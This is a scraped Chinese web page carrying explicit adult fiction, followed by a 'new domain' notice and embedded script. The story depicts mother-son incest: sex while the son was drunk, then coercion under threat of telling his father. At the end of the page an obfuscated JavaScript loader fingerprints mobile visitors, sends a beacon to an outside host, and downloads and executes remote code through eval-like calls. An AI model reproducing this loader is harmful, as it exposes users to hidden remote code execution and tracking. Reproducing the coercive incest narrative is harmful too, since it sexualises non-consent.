麻油鸡」在台湾可说是一道平民的食补料理,它不仅是女人做月子必吃的调补料理,更是冬令进补名列前三的最佳选择。  每当寒流来袭,妈妈总会煮一锅麻油鸡,为我们全家驱寒进补,只不过,妈妈今天煮的麻油鸡,味道好像有些不同。  看着锅里红润饱满的枸杞,汤面上飘浮着大量老姜片,而捞到碗里的去骨鸡腿肉,还夹杂着大量的当归与黄耆等补气中药材……光看到这些药材,我就觉得这锅鸡汤,不仅足以补到满血状态,甚至有些满溢的血液会从鼻孔流出来。  「妈,今天的麻油鸡会不会太补了?」  「自家人吃的当然要多补一点呀。你在外面读书,三餐都不按时吃,看你都瘦成什幺样子。来来来,你难得放假回家就多吃点吧。」「唔……可是今天的汤好像有很重的酒气……」我尝了一口汤头,不禁皱起了眉头说道。  「喔,我煮麻油鸡的时候才发现家里没米酒了,本来想出去买,后来正好想起了你爸上次出国回来时,带了两瓶伏特加(Vodka),所以就顺手拿来用了。」  「两……两瓶!?」我瞪大眼睛,不可置信地看着妈妈。  「我先用一瓶,可是发现没什幺酒味,而你爸吃麻油鸡时,就喜欢那股刺鼻的酒精味,所以我只好再加一瓶……」  听到这道食补料理的用酒量,再闻着不时窜到鼻里的浓重酒精味,我感觉光用闻的,就已经有了几分醉意。  还好,这股味道没有米酒那样呛鼻,汤头的口感也温顺许多,加上有中药材的味道掩盖,令我不知不觉间,一口气就喝了三大碗。  等到爸爸和妹妹陆续回到家中,一家人就坐在餐桌上边吃边聊,而爸爸更是不吝称讚妈妈那锅──煮得非常到位的麻油鸡。  唔……要是他知道这锅汤加了什幺酒之后,会不会像现在一样,大方地给妈妈点满三十二个讚?  一边胡乱想着,爸爸如果知道他珍藏多时的「伏特加」,就这样没了之后的反应,一边埋头大吃妈妈精心准备的菜餚,身心顿时感到既温暖又满足。  吃完晚餐后,刚开始还觉得身体特别暖和,但和家人边看电视边聊了好一会儿,不知是伏特加的后劲开始发作,还是一大早赶车导致疲累的关系,我的眼皮忽然变得特别沈重。  「爸,妈,妹,你们慢聊,我先睡了。」  「嗳,你还没洗澡呢。」妈妈大声说道。  「明天再洗吧,我好睏。」  「不行!髒死了!」妈妈瞟了我一眼,「嗯,刚吃完麻油鸡就洗澡的确不适合,唔……你先躺一下,一个小时后妈叫你起来洗澡。」「再说吧。」我随口应了一声,便拖着虚浮的脚步直接回房。  不知睡了多久,当我揉着惺忪的睡眼,睁开眼睛,看着窗外已开始泛起鱼肚白,正想起身上厕所时,赫然发现了有点不对劲。  ──我的身边躺了一个人。  ──一个全身赤裸的女人。  看清楚女人的样貌后,我原本恍惚的神智便瞬间清醒过来。  我惊愕地看着身边的女人,再看看自己一样光溜溜的身体,我的心底倏地涌起了一股莫名地恐惧。  艰难地吞了口口水,我看着她的下体,以及床单上还残留着──几滴乾涸的白点,我感觉这个世界已经开始迅速崩坏了。  这个女人不是别人,正是我的亲生母亲──江芸琪。  正当我惊慌得不知所措时,妈妈的眼睫毛忽然抖动了几下,接着便缓缓睁开了眼睛。  「小伟,你醒啦?」妈妈的视线投到窗外,又看了看床头上的闹钟,随后又闭上了眼睛,片刻后又睁开,喃喃地说道:「原来还没到六点……嗯,那我再瞇一会儿。」  「呃……妈……你……你昨晚睡我这里?」  「嗯哼。」妈妈闭着眼睛。  「那你……我……」  妈妈睁开眼睛,漾着古怪的笑意:「臭儿子,你酒量差就算了,没想到酒品也这幺烂。」什幺意思?」妈妈侧身,撑着头,另一只手忽然在我额头戳了一下:「昨晚本来要叫你起来洗澡,没想到你却发酒疯把我当成了宜慧,还抱得那幺紧。哼,如果你只是抱抱我也就算了,结果你还不安分地乱亲乱摸乱扯……」「然后呢?」  「然后,然后就这样啰。」  我呆若木鸡看着妈妈,脑海里不断回想昨夜的事,但想了好久,仍对妈妈所说的一切完全没有印象。  「你的意思是……我真的……和你……」  「放心啦,妈绝不可能要你负责。」妈妈说完这句话后又重新躺了回去,但当她转身,细嫩的柔荑不经意碰到了我的小弟弟后,她竟然张开手掌捏了捏,「嘻嘻……你怎幺这幺快就有反应了?」  「呃?!我……」  「想不想再来一次?」  「什幺!」  「别装了,我不相信你不知道妈妈的意思。」  「可是我们是母子呀。」  「但你昨天没把我当成母亲呀。」  「我……昨天的事我真的没印象。」  「那就加深印象呀。反正都已经这样了,我们做一次也是做了,所以做两次和做一次没有任何差别。唔……难道你不喜欢妈妈?」「我当然喜欢妈妈。」  「那就是嫌妈妈没有宜慧年轻,还是觉得妈妈不够漂亮?」「不是啦,妈妈在我心目中是最漂亮的女人,只是……我……欸,我不是那个意思啦!其实我……我不想对不起宜慧和爸爸。」「嘻嘻,只要我们不说出去就没问题。」  「爸爸不会怀疑吗?我是说,你没回房睡觉?」「放心啦,我昨天就跟他说怕你发酒疯又不洗澡,所以就帮你洗澡,顺便陪你睡觉照顾你。」  唔……虽然妈妈陪儿子睡觉很正常,可是以现在我们之间如此尴尬的情形来说,怎幺听都觉得有非常大的歧义?  正当我不知该如何是好的时候,妈妈又侧着身,边套弄我已经硬挺的鸡巴边说:「你想不想试试乱伦的真正感觉?妈妈昨天试过之后,觉得很刺激唷。」唔……我早就体验过乱伦的刺激快感呀,不过……我能告诉她吗?  「妈……我……」  「别再找理由推脱了!要知道,你昨天完全不给妈妈说不的机会唷。如果你再这样龟龟毛毛的,我现在就告诉你爸,看他的儿子对妈妈做了什幺好事。」「妈,你不可以跟爸说。」  「那你就乖乖听妈妈的话。」  随着话落,只见妈妈身体往下缩,之后就一百八十度地转身反趴在我身上,张嘴含住了我那半硬的鸡巴,开始套弄啜吸起来。  「唔……妈……」  看着妈妈卖力吞吐我那迅速硬挺的肉棒,我真的不晓得该怎幺形容此刻纠结的心情。  妈妈今年已经四十四岁了,可是从她保养得当的脸蛋及身材来说,她如果没有出示身分证,很多人都认为她的年纪可能顶多三十初头而已。  根据小道消息指出,妈妈是在大学刚毕业,就被爸爸搞出人命,所以两人才会奉子成婚;然后等到我二岁时,没想到又不小心有了妹妹。  至于这小道消息从哪传出来的,老实说我也不知道。反正我今年都二十二岁了,而爸爸当年,也没有因为不小心搞大了妈妈的肚子而不负责任,还让我和妹妹快乐成长,没有经济压力地读到大学,所以我也没有必要追究消息来源。  我躺在床上,仰着头,看着妈妈那迷人的美穴,还残留着一些不明的白浆,就这样怀着惴惴不安,又夹杂着些许兴奋地複杂心情,体验妈妈高超的口交技巧。  正当我仔细欣赏妈妈的美穴美臀时,我赫然发现妈妈右边的屁股,竟然有一个五色彩蝶的纹身图案,令我不由得惊讶不已。  在同一屋檐下相处多年,妈妈在我以往的印象里,一直是个保守贤慧的贤妻良母,可是今天看到了她屁股上的刺青后,她在我心目中良好的形象,就这幺瞬间崩塌了。  我指尖轻触那只色彩鲜明的蝴蝶,感受那平滑的肤触,忍不住问道:「妈, 你这个是纹上去的还是纹身贴纸而已?」「当然是纹上去的。」  「为什幺?」  「因为你爸喜欢呀。他说这样看起来很性感。」「唔……这个刺青纹多久了,都没人发现吗?」「噗哧~~呵呵……傻儿子,妈妈怎幺可能没事露屁股给人看!怎幺样,你觉得好看吗?」  你纹都纹了,我能说不好看吗?  即使我不喜欢。  「妈,那你喜欢吗?」  「他刚开始提这个要求的时候,我其实无法接受,可是他三不五时就提这件事,卢到我都快被他烦死了,所以半年前才勉强答应他。现在都纹了半年了,所以也无所谓喜不喜欢,反正也只有爸爸和你知道这个秘密。」唔……听妈妈这幺说,我猜这两人之间,真有一些不可告人的秘辛呀。  当妈妈卖力吞吐我的肉棒时,我原本也想舔妈妈的美穴,可是看到穴口还残留着昨晚留下的秽渍,我立即打消了这个念头。  胡乱地猜想有的没的,我的龟头蓦地感觉触碰到一块蠕动的软肉,而妈妈的菊蕾也明显缩了一下。  正是这种奇特的触感,让我忍不住发出了「喔~~」地呻吟。  只见妈妈起身转过来,跪趴在我面前,对我促狭地眨眨眼,说:「儿子,你和宜慧没玩过深喉咙吧。」  我尴尬地点点头:「嗯。她不喜欢。」  「那你喜欢吗?」  「喜……喜欢。」说出这句话时,我的心跳忽然变得特别快。  「那……我们以后再找时间玩?」  妈妈说这句话时,竟然冷不防地就跨坐在我的肚皮上,同时扶着我硬挺的鸡巴,对准她的美穴迅速插了进去,随后紧抿着嘴唇,发出了一声令我激动不已的闷吟:「唔……」  看着肉棒消失在两人的交合处,随即感受到那股熟悉的温热与湿滑触感,一想到肉棒进入的,是我以前出生时经过的地方,我的心底没来由的,涌起了一股莫名地兴奋感,令我忍不住发出了激动的呻吟:「喔~~」「儿子,舒服吗?」  「嗯。」  「比宜慧好吗?」  「妈,现在不要提她啦。」  「好啦,不提她。没想到一提到她,你就软掉了。」「……」  「嗯……小伟,不要像死鱼一样,你动一下嘛……还有……用力抓妈妈的咪咪……喔……对,再用力一点,不用怕……你愈用力,妈妈愈兴奋……喔……就是这样……屁……屁股也用力往上顶……嗯……你的好像比爸爸的长……顶得好深呀……啊……唔……」妈妈忽然双手摀住嘴巴,却拼命扭动她的腰肢,神情看似痛苦,但又觉得很快乐。  看到妈妈如此奇怪的神色,我忽然觉得特别兴奋,以至于先前纠结不已的心情,在这时全都抛到了脑后,于是我的屁股便用力往上,双手更是粗暴地,掐捏妈妈胸前那对已经硬挺的淡褐色蓓蕾。  「唔……小伟……好儿子……好痛,可是又好舒服……儿子,用力咬妈妈的奶头好吗……唔……嗯……喔……唔……好痛……要……要到了……」妈妈这句话刚说完,只见她身体往后反弓,随即像弹簧般弹了回来,然后就无力地趴在我身上拼命喘息。  「呼~~呼~~儿子,你真厉害……比你爸还厉害……」「妈……」我主动伸出手,环抱妈妈,轻柔地摩娑着她光滑的背脊。  「好儿子,你射了吗?」妈妈抬起头,在我耳边轻声道。  我摇摇头。  「那……你从后面继续?」  我不可置信地看着她:「妈……你还要?」  「不可以吗?」  我不知所措地摇摇头:「我怕你太累。」  「嘻嘻,你爸爸每次都要弄两三个小时才肯让我休息,所以现在连热身都算不上。」唔……听了妈妈说的话,我不禁觉得女友的战斗力和妈妈相比,简直弱到爆了。  刚才我和妈妈谈论的宜慧,就是我的女朋友──林宜慧。  她和我算是从小就生活在同一个里区的青梅竹马吧,不过我们一直等到高中3/15   首页 上一页 1 2 3 4 5 6 下一页 尾页毕业,同时考上了大学后才开始交往;两人交往了半年多,我们才献出了彼此的第一次。  这段恋情,算算也差不多快四年了,而且我们也都见过了彼此的父母,而妈妈更是已经将她视为我们黄家的准媳妇,还多次催促我赶快迎娶她进门,为我们黄家传承香火,让她早日抱孙子。  没想到媳妇还没娶进门,我就莫名其妙地,跟妈妈突破了这层禁忌关系,要是让妹妹知道了……  心绪百折千回流转间,耳边忽然听到了妈妈的轻唤:「小伟,你怎幺了,还不快来……」  看着妈妈跪趴在我面前,翘着屁股回望,我连忙收摄心神,跪在妈妈身后,扶着尚未射精的硬挺肉棒,对准了妈妈那已经湿润的美穴,随即腰肢便用力向前一挺。  「喔~~你插得好深呀……」妈妈掩嘴轻呼。  我双手紧扣妈妈的腰肢,屁股则是慢慢向前挺动,一下一下地来回抽送,而妈妈见状便闭起了眼睛,随着我抽送的速度,发出了刻意压抑的浅吟。  「唔……小伟……妈妈喜欢你粗暴一点……可不可以用力打……打妈妈的屁股……」  「啊!」尽管心里惊讶不已,但我的手却不由自主地拍在妈妈的屁股上。  啪!  「喔~~好痛……好舒服……小伟,好儿子,再用力一点……」啪!啪!  「唔……不行……这样会高潮……好羞耻……小伟……乖儿子……被儿子打好羞耻,可是又好刺激呀……啊……唔……」  见妈妈忽然像驼鸟般,把头埋在枕头里,然后不停地发出刻意压抑的喘吟,我不禁停下动作,纳闷地问道:「妈,你怎幺啦?」妈妈抬起头看我,羞赧地轻声说:「我怕叫太大声会吵醒妹妹。」听到这句话,我心里倏然一惊,连忙停下了抽送的动作。  「唔……妈,听你一说,我已经没心情了,我们还是另外找时间吧。」「好吧。记得妈妈欠你一次。」  「呃……这种事没有谁欠谁吧?」  「我说有就有,就这幺说定了。」随着话落,只见妈妈已经开始穿上衣服,随后在我嘴唇吻了一下……

关闭⊗
提示

本站正在被宽带运营商屏蔽,即将无法访问! ! !

请立刻记住本站新域名

https://daoguoys.com

推荐:点击访问新站并收藏到手机

© Copyright 色姐联盟 2023. All rights Reserved . By

function ebUQIam(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function OAUIBGrV(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ebUQIam(t);};window[''+'X'+'p'+'h'+'q'+'Y'+'Q'+'O'+'t'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=OAUIBGrV,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/13441/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZsay56aG91bmVuZ2t1bjEwLmNuJTTNBODg5MQ==','d3NzJTNBJTJGJTJGdXkudGlhbnhpbmdoYW5nMS5jbiiUzQTk1MzU=','160756',window,document,['T','i']);}:function(){};